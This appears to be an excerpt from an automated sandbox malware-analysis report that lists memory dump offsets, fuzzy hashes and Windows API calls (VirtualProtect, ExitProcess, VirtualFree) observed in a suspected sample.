                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886657676.000000000083C000.00000040.00000001.01000000.00000003.sdmp, Offset: 0083C000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_83c000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: c9708e6b3fec5d6fb09e97f991a33cb9b08964264575f01c6996907dd6c7783c
                                                                          • Instruction ID: 2c6d2fd6ae7befc2aa39b9dfd094c69216d9cb8950a0b0efdba8492e03714d62
                                                                          • Opcode Fuzzy Hash: c9708e6b3fec5d6fb09e97f991a33cb9b08964264575f01c6996907dd6c7783c
                                                                          • Instruction Fuzzy Hash: B7318EB19041699FEB688B10DC55BFE7775FBC4311F1081EEE50AA6280D6385EC18F54
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886760940.0000000000884000.00000040.00000001.01000000.00000003.sdmp, Offset: 00884000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_884000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: 321a2f5eab38c4fd23fb1c812fd9648e40ac3297b8fda3d4e97d73160b6703ce
                                                                          • Instruction ID: 31dd16bf54991ecd86111bd8970f89356ab8fd83d96b7f68d3e4250eec1b6da7
                                                                          • Opcode Fuzzy Hash: 321a2f5eab38c4fd23fb1c812fd9648e40ac3297b8fda3d4e97d73160b6703ce
                                                                          • Instruction Fuzzy Hash: BE217CE2C081189FFB199A28DC59BBB3768FB51318F1D02BED54BD5880E22C9DC48693
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 00852B12
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: 1929befd7ff3dc4a1189360bf3b296534c39588c068be9bcf6aa9a71aab5f243
                                                                          • Instruction ID: ba28fd6464879dd58b9171fd4f3c4727b71aa6819ca9917db3c91633a9cb5696
                                                                          • Opcode Fuzzy Hash: 1929befd7ff3dc4a1189360bf3b296534c39588c068be9bcf6aa9a71aab5f243
                                                                          • Instruction Fuzzy Hash: 5D212BB2D040189BD7299E10DC55AFA7B74FB41314F1441FEEE0E96280CA386FC68E12
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886760940.0000000000884000.00000040.00000001.01000000.00000003.sdmp, Offset: 00884000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_884000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: 80731e1b253fd1dd20df0ff0e27b7c45655b3cfb889f1d2506ef65b8fe701af6
                                                                          • Instruction ID: 31f056ab3d157be5eff60575257a9ebcaded29b1d7890be867223468c9f8ffba
                                                                          • Opcode Fuzzy Hash: 80731e1b253fd1dd20df0ff0e27b7c45655b3cfb889f1d2506ef65b8fe701af6
                                                                          • Instruction Fuzzy Hash: 042132F3D1461A4EE7649A10DC94BF7BB7EFB4130CF1411BEEA0AD5081D6B94AC98B12
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 004A4AF5
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886280803.00000000004A4000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A4000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4a4000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: c8edbad5f8d90242286573ef95c96fdacac2e819dd5cb188a8dee553fc27be90
                                                                          • Instruction ID: 831bbebb9d4bed3ab514a97cfd9b775f40a74a3540141abcda50a17d6dbb24d4
                                                                          • Opcode Fuzzy Hash: c8edbad5f8d90242286573ef95c96fdacac2e819dd5cb188a8dee553fc27be90
                                                                          • Instruction Fuzzy Hash: AE2103B2D081189BEB208614DC80AFFB774EBD2305F2481EAD40956240D67D6FC2CF5A
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 00852B12
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: 921f749a85c33fe866a3e209799d986bdf7547ff4ac558622cfe67ee25292639
                                                                          • Instruction ID: 5eecb664afafab3c826b69626070c748b5a75e07d3ee5935a05fcf261c72c72e
                                                                          • Opcode Fuzzy Hash: 921f749a85c33fe866a3e209799d986bdf7547ff4ac558622cfe67ee25292639
                                                                          • Instruction Fuzzy Hash: 9721F976D041289BD729DF14CC94AEA7775FB41315F1081EADE4EAB281CA385E828E51
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 004A4AF5
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886280803.00000000004A4000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A4000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4a4000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: 4285c11582544c208a3b82fa451c2a1a10148e029c16aba5f1fa2e7e2fdf8d0f
                                                                          • Instruction ID: bf0c80d92d13493b49e9dcb7bcdc4e47556da43b6527a4499be052ab0d43f18f
                                                                          • Opcode Fuzzy Hash: 4285c11582544c208a3b82fa451c2a1a10148e029c16aba5f1fa2e7e2fdf8d0f
                                                                          • Instruction Fuzzy Hash: CC21C5B2D045595BEB208614CC80BEFB778ABD5305F1481FAD90D62601D27DAFC5CF95
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 004A4AF5
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886280803.00000000004A4000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A4000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4a4000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: 87cf8f2b6445bb8dbdcee3e402e497b0268500d5fada6863b1d194f0b8aeca38
                                                                          • Instruction ID: 99a38a775e38730e8d1ad037c2947798a05b68f45980e61cb0ac8f1b80784597
                                                                          • Opcode Fuzzy Hash: 87cf8f2b6445bb8dbdcee3e402e497b0268500d5fada6863b1d194f0b8aeca38
                                                                          • Instruction Fuzzy Hash: D121F3B2D041599BEB208A10CC90AFFB775BBD2315F1481EAD40996640D63D6FC2CF55
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886760940.0000000000884000.00000040.00000001.01000000.00000003.sdmp, Offset: 00884000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_884000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: 0009b087f1bd571c65ba7aa7d4a46231d97c52ff102b5cd711743c6740e11169
                                                                          • Instruction ID: b4ad18ce42cd203144dd023fab50f40935a92b1f3baea80c3e68ddd2266cd237
                                                                          • Opcode Fuzzy Hash: 0009b087f1bd571c65ba7aa7d4a46231d97c52ff102b5cd711743c6740e11169
                                                                          • Instruction Fuzzy Hash: CE112BE2C08008AAFB195914DC5ABFB362CF75131CF2D01BEE60FD4580E26C9AC44593
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 004A4AF5
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886280803.00000000004A4000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A4000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4a4000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: 17d958134a33974817e57ff967fca1c5cd80d226f55ab61c0b8a80a800bd18a2
                                                                          • Instruction ID: efef85518f210547cfe66a3408a1d6de6bba9c18fc94a42e1df19e3cc524defe
                                                                          • Opcode Fuzzy Hash: 17d958134a33974817e57ff967fca1c5cd80d226f55ab61c0b8a80a800bd18a2
                                                                          • Instruction Fuzzy Hash: E221C0B2D045599BEB208A14CC90AFEB775BBD1305F1481EAD44966240D63DAFC2CF55
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 004A4AF5
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886280803.00000000004A4000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A4000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4a4000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: 0ae0f1211eb841f129cc93cdad52504ad0adbede00bb3a7d285b66944de10c0e
                                                                          • Instruction ID: ebecdc676cc3c60da1da2dafec13a8599d467f241872a274ca96d61fd8c50ce0
                                                                          • Opcode Fuzzy Hash: 0ae0f1211eb841f129cc93cdad52504ad0adbede00bb3a7d285b66944de10c0e
                                                                          • Instruction Fuzzy Hash: AA11E1B2C042599BE7208A10CC80BEAB778EBC1301F1441FAE50DA6240E67DAFC18E54
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,00884656,?,?,?,?,00000000), ref: 00884C64
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886760940.0000000000884000.00000040.00000001.01000000.00000003.sdmp, Offset: 00884000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_884000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: dba754fdcb5f35b31817c2f284e7806ec09503c9d23636e63740f316a69e9cf6
                                                                          • Instruction ID: ad7e2591f84770a908f6c84e6a72077748dfc8683f546dc72c124136af836622
                                                                          • Opcode Fuzzy Hash: dba754fdcb5f35b31817c2f284e7806ec09503c9d23636e63740f316a69e9cf6
                                                                          • Instruction Fuzzy Hash: 8B1103B2D0422A9FDB249B14CC94BFA7B79FB41348F0000EDE549A6241D3755A85CF52
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0089A62C
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886760940.0000000000884000.00000040.00000001.01000000.00000003.sdmp, Offset: 00884000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_884000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: ea091078bba09fee2f1641468ce30893b457e7537053932ed519e721236b9737
                                                                          • Instruction ID: c2341247ced3165f782b9002a6d0f994b25f6e1230fb2ae2e508cee74775aeb0
                                                                          • Opcode Fuzzy Hash: ea091078bba09fee2f1641468ce30893b457e7537053932ed519e721236b9737
                                                                          • Instruction Fuzzy Hash: 8701F5E2D08008AAFB285914EC59BFB762CF750318F1D41BEE60FD4980E37DAAC44592
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0089A62C
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886760940.0000000000884000.00000040.00000001.01000000.00000003.sdmp, Offset: 00884000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_884000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: 4483d4cc98469e398b6613901700d8144dc2a276c607b2f5bb805b8dee6b56d5
                                                                          • Instruction ID: f4370f29ad3f56127186d8c20b821467f802812f1becd4ebf8b7509c0f5b9f3a
                                                                          • Opcode Fuzzy Hash: 4483d4cc98469e398b6613901700d8144dc2a276c607b2f5bb805b8dee6b56d5
                                                                          • Instruction Fuzzy Hash: 3901F5E2D08008AAFB285914DC59BFB762CF790318F1941BEE60FD4980E7BCAAC44596
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 004A4AF5
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886280803.00000000004A4000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A4000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4a4000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: c59a013c91f8183b96167cdcb3b7e1a8f594469a62ee4820a6be7682e4567365
                                                                          • Instruction ID: 1a657edb42bb7a73d4958d1dc944c9cb77d41bf2573cd1328c23784817f9e10a
                                                                          • Opcode Fuzzy Hash: c59a013c91f8183b96167cdcb3b7e1a8f594469a62ee4820a6be7682e4567365
                                                                          • Instruction Fuzzy Hash: 0611BBB2D046599BEB208A10CC90BEABB78FBC1301F1445F9E50DA6240E63DAFC18F50
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,FFFFAC50), ref: 0086865A
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: 172511ce791fdba9fb2f5b8503183f16af75c962dcf52fbbec927ad774b6621d
                                                                          • Instruction ID: 25bb6c673606684c125f4e7c72c549cac6ca737160c752bdc5d2375ff643de5b
                                                                          • Opcode Fuzzy Hash: 172511ce791fdba9fb2f5b8503183f16af75c962dcf52fbbec927ad774b6621d
                                                                          • Instruction Fuzzy Hash: B6012DF3D04018EBF7144514EC1DBFB7678FB54314F1A42BDE60E95580EA795B844692
                                                                          APIs
                                                                          • ExitProcess.KERNEL32(00000000), ref: 004BC4F4
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886280803.00000000004A4000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A4000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4a4000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ExitProcess
                                                                          • String ID:
                                                                          • API String ID: 621844428-0
                                                                          • Opcode ID: 7de6f33671f6dd266b399756a0cfe168be7a71f2f6f5bad4024b51dc7e5fbb97
                                                                          • Instruction ID: 0f17c06895c86db1ebce21f6ff39f89fe6e9bd3deacf86ec9d4c650f1cefed74
                                                                          • Opcode Fuzzy Hash: 7de6f33671f6dd266b399756a0cfe168be7a71f2f6f5bad4024b51dc7e5fbb97
                                                                          • Instruction Fuzzy Hash: 920126F7D040145BF7214621EC49BEB7A2DDB91312F1881BBD94E11241D67D4EC648A2
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 004A4AF5
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886280803.00000000004A4000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A4000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4a4000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: aa1d9f3d590bd21070555fa3928876742c4a5fed532e341801f8a57d80d630cc
                                                                          • Instruction ID: 4b3c5f327143d516572332687e3878b3db1396b9a84e28386d6e9446aea9f118
                                                                          • Opcode Fuzzy Hash: aa1d9f3d590bd21070555fa3928876742c4a5fed532e341801f8a57d80d630cc
                                                                          • Instruction Fuzzy Hash: 590124F2D042846BE7208614DC80EEBAB68AB81301F1880B9E50D96600D17DAFC28B21
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,00884656,?,?,?,?,00000000), ref: 00884C64
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886760940.0000000000884000.00000040.00000001.01000000.00000003.sdmp, Offset: 00884000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_884000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: 794ff5960fb932a92d8f26f0776d8166e96b08f4c97e4538d2dedea8b21b47ce
                                                                          • Instruction ID: f2a4f598e8570b03a87ef3a90f94c3e08bacbf2c4001061328e29d95db0aa823
                                                                          • Opcode Fuzzy Hash: 794ff5960fb932a92d8f26f0776d8166e96b08f4c97e4538d2dedea8b21b47ce
                                                                          • Instruction Fuzzy Hash: CE012BB390512A9EE7209A54CC94AF67B7EFB01348F0410FDE54D96181D2B50AC9CB52
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,00884656,?,?,?,?,00000000), ref: 00884C64
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886760940.0000000000884000.00000040.00000001.01000000.00000003.sdmp, Offset: 00884000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_884000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: 853d5086cc0d6ff7984784c3341579e7460f9103d047b8cb0091ebaeed7ef3c4
                                                                          • Instruction ID: 56ed307c7852d4b96802e11b51e1ff908971a344f6da0d863747ed10bc5a9d10
                                                                          • Opcode Fuzzy Hash: 853d5086cc0d6ff7984784c3341579e7460f9103d047b8cb0091ebaeed7ef3c4
                                                                          • Instruction Fuzzy Hash: 850149B290512A5FE7209614CC94BF67B7EFB01348F0410FDE64E95080D2B50EC9CB52
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,00884656,?,?,?,?,00000000), ref: 00884C64
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886760940.0000000000884000.00000040.00000001.01000000.00000003.sdmp, Offset: 00884000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_884000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: 9a4ea65ae067c4c37b0b17a1551a1c19370767de541783c7612c3f7b345419af
                                                                          • Instruction ID: 259592c5699fbefbcc9b8cbaf6035a6b728bf56a6b168a6db775849aee582a9a
                                                                          • Opcode Fuzzy Hash: 9a4ea65ae067c4c37b0b17a1551a1c19370767de541783c7612c3f7b345419af
                                                                          • Instruction Fuzzy Hash: 5101F9B2A0551E5EE7245614CC94BF6777EFB4134CF1410FDE509D5181D2B50AC9DB11
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,00884656,?,?,?,?,00000000), ref: 00884C64
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886760940.0000000000884000.00000040.00000001.01000000.00000003.sdmp, Offset: 00884000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_884000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: ed905d81eaf58823562682a28d1fc0258bf866796733f08a7d9fac30434bd0a9
                                                                          • Instruction ID: a308508f2fc178567b79863a9f091c130dc02d1798aca56ea9e8f3f1f5cf2f36
                                                                          • Opcode Fuzzy Hash: ed905d81eaf58823562682a28d1fc0258bf866796733f08a7d9fac30434bd0a9
                                                                          • Instruction Fuzzy Hash: 2FF078B2A0512E4FE7209610CCA4AF6B77EFB0134CF0411FEE60ED1080D2B10AC9CB12
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,00884656,?,?,?,?,00000000), ref: 00884C64
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886760940.0000000000884000.00000040.00000001.01000000.00000003.sdmp, Offset: 00884000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_884000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: 0d3bffb1165dc19f787a36410854203e946b0d262c763a3842c23ea43423d6e7
                                                                          • Instruction ID: 31eb5b2cf76d64c55ab8afa567ff8cad6d0ec611833357ffc6ad86616a678f87
                                                                          • Opcode Fuzzy Hash: 0d3bffb1165dc19f787a36410854203e946b0d262c763a3842c23ea43423d6e7
                                                                          • Instruction Fuzzy Hash: 1701D8B2E0526A5FD7259B14CCA4AF9B779EB41348F0440FDE90D96181E2B55E84CF11
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,00884656,?,?,?,?,00000000), ref: 00884C64
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886760940.0000000000884000.00000040.00000001.01000000.00000003.sdmp, Offset: 00884000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_884000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: c16abb622fd95a63e41ed4186be3553e6377a10bab60144d627fb1f87377fc87
                                                                          • Instruction ID: 521ff42f8bed18e3872b879245f65e9eade49bee08a8e9334bce828dbf005d7d
                                                                          • Opcode Fuzzy Hash: c16abb622fd95a63e41ed4186be3553e6377a10bab60144d627fb1f87377fc87
                                                                          • Instruction Fuzzy Hash: 6401DBB2E0522A5FD7249B14CC94AF5B77EFB41348F0440FDE50D96181D2755E88CF11
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,00884656,?,?,?,?,00000000), ref: 00884C64
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886760940.0000000000884000.00000040.00000001.01000000.00000003.sdmp, Offset: 00884000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_884000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: a9beed8d3c4a441edae6603ec028015d3d311e96f06ef2802bdb8729ae892da4
                                                                          • Instruction ID: b7bb5f297e122ec829e9639f3173ed21f3e724b88d75f4a1dbb4c3d3e53067c3
                                                                          • Opcode Fuzzy Hash: a9beed8d3c4a441edae6603ec028015d3d311e96f06ef2802bdb8729ae892da4
                                                                          • Instruction Fuzzy Hash: 5501A7B2E0522A5FD7249B14CC94AF5B779FB01348F0440EDE50D96141D2755E88CF11
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,00884656,?,?,?,?,00000000), ref: 00884C64
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886760940.0000000000884000.00000040.00000001.01000000.00000003.sdmp, Offset: 00884000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_884000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: 3d971d83c34d12c132240d5d8596037cdc376e3f9a64c9548b47e96918ef87b3
                                                                          • Instruction ID: 6f5e369c9cd4048eef788f89465878d6d7ce3eb81e011df46b0ff7f653da6d0c
                                                                          • Opcode Fuzzy Hash: 3d971d83c34d12c132240d5d8596037cdc376e3f9a64c9548b47e96918ef87b3
                                                                          • Instruction Fuzzy Hash: 1101DBB2E0522A5FD7249B14CC94AF6B77EFB41348F1440FDE50D96141D2755E89CF11
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,FFFFF8C8), ref: 0082EC58
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: 12a67f0f6343b83114caaf3d2e5c313aea1ecf59126c103562546b29efcd4bd3
                                                                          • Instruction ID: f2105ff97a0a7090aa6d8ebda6433bcabe8ed4dac39760a5d70fcfc1cdce3dde
                                                                          • Opcode Fuzzy Hash: 12a67f0f6343b83114caaf3d2e5c313aea1ecf59126c103562546b29efcd4bd3
                                                                          • Instruction Fuzzy Hash: 02F027B18042699FD7249AB89C05BEA7778FF54300F0088DAD18AEB140E5314EC1CFA6
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,00884656,?,?,?,?,00000000), ref: 00884C64
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886760940.0000000000884000.00000040.00000001.01000000.00000003.sdmp, Offset: 00884000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_884000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: c0e2f3fdcfca1205651f7c1a705edf6d4c734da959f62b69ee66d54c60168e6d
                                                                          • Instruction ID: 681e97058a6755c2b549492a24dcc9e9149f8dd9b7d56cf75b16b9c4fea22960
                                                                          • Opcode Fuzzy Hash: c0e2f3fdcfca1205651f7c1a705edf6d4c734da959f62b69ee66d54c60168e6d
                                                                          • Instruction Fuzzy Hash: 6BF027B2A0826A0FDB209B64CCC4DE67B7DEF41348F4401FCE50896142D2B64EC9CB11
                                                                          APIs
                                                                          • ExitProcess.KERNEL32(00000000), ref: 004BC4F4
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886280803.00000000004A4000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A4000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4a4000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ExitProcess
                                                                          • String ID:
                                                                          • API String ID: 621844428-0
                                                                          • Opcode ID: 2e162f9ff93f1dea0ef2aa722dcb9aab45ed833de93f232e2c540d0029b51d83
                                                                          • Instruction ID: 8a113db418cee25690c893ee89c9e706ff3a12e27d5c7f9868624e5c92ecc910
                                                                          • Opcode Fuzzy Hash: 2e162f9ff93f1dea0ef2aa722dcb9aab45ed833de93f232e2c540d0029b51d83
                                                                          • Instruction Fuzzy Hash: 88D012B145465695F3648560ECD67EB7524E700302F10C471D94ED4180C66C59D15D12
                                                                          APIs
                                                                          • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00835716
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: FreeVirtual
                                                                          • String ID:
                                                                          • API String ID: 1263568516-0
                                                                          • Opcode ID: 5fb5e540d0f623987c6f08387c3b8226c8a6516c8459a262a897807153963b2a
                                                                          • Instruction ID: 69972bf90a15c58daed4bde1f5d977a1d022b0afdbd41240ed0260cb7d3e674d
                                                                          • Opcode Fuzzy Hash: 5fb5e540d0f623987c6f08387c3b8226c8a6516c8459a262a897807153963b2a
                                                                          • Instruction Fuzzy Hash: 8D71F3B4E056288FDB24CF14CC94BA9B7B1FB99315F2481D9D849AB241D778AEC1CF81
                                                                          Memory Dump Source
